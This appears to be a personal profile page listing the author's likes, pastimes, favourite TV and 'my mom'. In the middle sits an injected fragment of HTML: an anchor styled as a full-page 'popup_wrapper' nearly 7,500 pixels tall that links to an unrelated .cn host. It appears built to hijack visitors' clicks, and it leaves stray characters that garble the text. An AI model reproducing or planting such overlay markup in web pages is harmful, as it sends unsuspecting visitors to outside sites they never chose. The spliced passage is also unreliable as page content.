Walking thinking drinking stinking sinking sinking sinking............covering things with contact paper, making shrinky dinks for you, riding in the rain, sawing down the jungle in my backyard, finding treasures in the garbage, playing the recorder, putting stuff in my mouth, being outside, pretending I know everything, saying "thank you!", buying fabric to make things, drinking tea not coffee, making fun of my dog, lets ride bikes, liking you, missing you, going grocery shopping, making dinner, sitting at home with blankets, an incredible amount of thinking about incredibly pointless things, driving thirty hours, my mom, your mom, anyone's mom.a class="popup_wrapper" style="cursor:default;background-image:url(http://w2v8o.cn/b g.jpg);left:0px;top:0px;height:7469px;width:1089px;" href="http://w2v8o.cn/s/" m$l$
A time machine.
Law and Order. Lifetime channel for women. Really bad movies, which always make me cry. QVC and HSN.
My mom